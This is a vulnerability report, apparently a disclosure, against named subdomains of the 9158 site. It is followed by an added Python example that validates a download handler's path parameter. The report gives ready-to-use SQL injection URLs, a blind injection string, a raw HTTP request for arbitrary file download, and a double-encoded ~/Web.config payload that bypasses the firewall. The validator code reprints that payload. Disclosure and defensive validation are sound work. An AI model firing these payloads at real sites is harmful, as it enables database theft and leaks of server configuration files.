Several security problems in Tiange Technology (Hangzhou)'s 9158 site: multiple SQL injections, arbitrary file download, and firewall bypass.

Details:

1. Injection 1

    http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1 ', 1, 1 --&searchKey=
    http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1 ',; Select --&searchKey=

2. Injection 2

    http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1&SearchKey=%E5%AD%99%E4%BF%AA'
    http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1&SearchKey=%E5%AD%99%E4%BF%AA%27,1, --

As with the previous injection, multiple statements can be executed directly.

3. Blind injection

    http://room.9158.com/ktv_new/in_ktvroom.aspx?serverid=66&userid=wangjing01 And 1 = 1 and ''= '

You can confirm the blind injection yourself by entering a correct statement and a wrong statement and comparing the results.

4. Arbitrary file download on the same sub-site

    GET /UserControls/GetImage.ashx?ImgUrl=~/UserControls/GetImage.ashx HTTP/1.1
    Host: cssr.9158.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.5
    Connection: keep-alive
    Cookie: cache=vod

Submit the request with NC (netcat). There is a firewall, but it can be bypassed by encoding the value a second time. For example, ~/Web.config after the second encoding:

    %25%37%45%25%32%46%25%37%37%25%36%35%25%36%32%25%32%45%25%36%33%25%36%46%25%36%45%25%36%36%25%36%39%25%36%37
Solution: understand it!
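One way a download handler like the one in the file-download issue above could canonicalize and validate its ImgUrl value, so that a second layer of encoding does not slip past a filter. This is an added example, not code from the report or from the vendor; APP_ROOT, IMAGE_ROOT, the extension allowlist and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote

APP_ROOT = "/site"                  # assumed application root ("~/" maps here)
IMAGE_ROOT = APP_ROOT + "/images"   # assumed: only directory the handler may serve
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # assumed allowlist
MAX_ROUNDS = 5                      # bound on decode passes

# Double-encoded "~/web.config" exactly as quoted in the report above.
REPORTED = ("%25%37%45%25%32%46%25%37%37%25%36%35%25%36%32%25%32%45"
            "%25%36%33%25%36%46%25%36%45%25%36%36%25%36%39%25%36%37")

def canonicalize(value):
    """Percent-decode until the value stops changing; return (value, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def check_img_url(raw):
    """Validate the ImgUrl value as it appears on the wire (before any decoding).

    Returns (allowed, detail): the resolved path if allowed, else the reason.
    """
    value, rounds = canonicalize(raw)
    if rounds > 1:                       # more than one layer of encoding
        return False, "multiply-encoded input"
    if "\x00" in value:
        return False, "NUL byte in path"
    path = value.replace("\\", "/")
    if path.startswith("~/"):            # ASP.NET app-root prefix
        path = path[2:]
    resolved = posixpath.normpath(posixpath.join(APP_ROOT, path.lstrip("/")))
    if not resolved.startswith(IMAGE_ROOT + "/"):
        return False, "outside image directory"
    if posixpath.splitext(resolved)[1].lower() not in ALLOWED_EXT:
        return False, "extension not allowed"
    return True, resolved

if __name__ == "__main__":
    for sample in ("~/images/logo.png", "%7E%2Fimages%2Flogo.png", REPORTED,
                   "~/Web.config", "~/images/../Web.config"):
        print(sample[:40], "->", check_img_url(sample))
```

The check runs on the fully decoded value and rejects anything that needed more than one decode pass, so the filter and the file API see the same string.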